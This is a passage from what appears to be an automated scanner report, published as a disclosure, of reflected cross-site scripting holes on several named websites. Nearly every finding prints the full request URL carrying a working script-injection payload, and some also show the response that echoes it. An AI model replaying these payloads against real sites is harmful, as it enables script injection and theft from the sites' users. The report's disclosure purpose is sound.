HTTP/1.1 Host: login.sisna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... dKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D59ad7"><script>alert(1)</script>2c2eb30ca40&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dl ...[SNIP]...
4.24. http://login.sisna.com/login_multiple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://login.sisna.com
Path:
/login_multiple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a2a"><script>alert(1)</script>13fcf75185c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2&b7a2a"><script>alert(1)</script>13fcf75185c=1 HTTP/1.1 Host: login.sisna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f363"><script>alert(1)</script>b45a55df056 was submitted in the vid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd35f363"><script>alert(1)</script>b45a55df056&fl=null&size=320x79 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The value of the size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7ba"><script>alert(1)</script>d13f9b9ff8c was submitted in the size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small6e7ba"><script>alert(1)</script>d13f9b9ff8c&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
<script> function showGLOW() { document.getElementById('snapshot_glow').style.display = ''; } function hideGLOW() { document.getElementById('snapshot_glow').style.display = 'none'; }
function ...[SNIP]... m/preview.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small6e7ba"><script>alert(1)</script>d13f9b9ff8c&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+% ...[SNIP]...
The value of the svc request parameter is copied into the HTML document as plain text between tags. The payload 20f2d<script>alert(1)</script>86efd429486 was submitted in the svc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=20f2d<script>alert(1)</script>86efd429486&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 44ce3<a%20b%3dc>b5cf3745f80 was submitted in the url parameter. This input was echoed as 44ce3<a b=c>b5cf3745f80 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /shot/?url=44ce3<a%20b%3dc>b5cf3745f80&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7832"><script>alert(1)</script>423eac9122e was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shot/?url=a7832"><script>alert(1)</script>423eac9122e&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 87005<script>alert(1)</script>538521ad19a was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c737587005<script>alert(1)</script>538521ad19a&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... ain_js/v6.59/"; s.parentNode.insertBefore(js, s); var js = document.createElement("script"); js.type = "text/javascript"; js.src = "http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c737587005<script>alert(1)</script>538521ad19a/" + SNAP_COM.hash(document.location.href) + "/auto_shot.js?sz="+SNAP_COM.size()+"&lm="+escape(document.lastModified)+"&size=small&accept=shots"; s.parentNode.insertBefore(js, s); } SNAP_ ...[SNIP]...
The value of the preview_trigger request parameter is copied into the HTML document as plain text between tags. The payload d95c1<script>alert(1)</script>aa502bc404 was submitted in the preview_trigger parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icond95c1<script>alert(1)</script>aa502bc404&domain=www.slaviks-blog.com HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... ow_internal:false,preview_only:false,preview_type:null,no_rss:0,rich_only:false,plugin:false,rescan_after_load:false,thumbnail_precrawl:0,show_link_icon:false,link_icon_types:true,preview_trigger:"icond95c1<script>alert(1)</script>aa502bc404",image_trigger:false,shots_domain_match:null,shot_check:1,search_type:"spasense",redirect_param:null,client_ip:"173.193.214.243",user_agent:"Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29 ...[SNIP]...
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b731%3balert(1)//58a9bba0f77 was submitted in the jscallback parameter. This input was echoed as 8b731;alert(1)//58a9bba0f77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback18b731%3balert(1)//58a9bba0f77 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:54 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Tue, 26 Apr 2011 14:21:54 GMT Age: 0 Connection: keep-alive
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d361"><script>alert(1)</script>526ac49452b was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D07d361"><script>alert(1)</script>526ac49452b HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 205 Date: Tue, 26 Apr 2011 14:21:10 GMT Age: 0 Connection: keep-alive
4.34. http://spamlaws.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://spamlaws.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5c8c'-alert(1)-'43cbe071eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=10143&b5c8c'-alert(1)-'43cbe071eb6=1 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki9ubwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:12 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki9ubwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:12 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:21:12 GMT Age: 0 Connection: keep-alive Content-Length: 11733
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2cbe2%3balert(1)//ce669c8cced was submitted in the jscallback parameter. This input was echoed as 2cbe2;alert(1)//ce669c8cced in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303827671318&pagecl=6516&fv=10&muid=&refurl=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&ipid=10143&jscallback=$iTXT.js.callback02cbe2%3balert(1)//ce669c8cced HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgAAAAAAAAAAAAEKCgc1; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:22:40 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:22:40 GMT Age: 0 Connection: keep-alive Content-Length: 18079
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback02cbe2;alert(1)//ce669c8cced({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
4.36. http://spamlaws.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://spamlaws.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e30"-alert(1)-"30a0183f25f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303827671318&pagecl=6516&fv=10&muid=&refurl=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&ipid=10143&jscallback=$iTXT.js.callback0&e7e30"-alert(1)-"30a0183f25f=1 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgAAAAAAAAAAAAEKCgc1; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:22:46 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:22:46 GMT Age: 0 Connection: keep-alive Content-Length: 18060
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... OSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","e7e30"-alert(1)-"30a0183f25f":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.spamlaws.com/spam-blocker.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.pa ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 88f92<script>alert(1)</script>469cca08b69 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html88f92<script>alert(1)</script>469cca08b69 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 863f5(a)6ceac5198b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
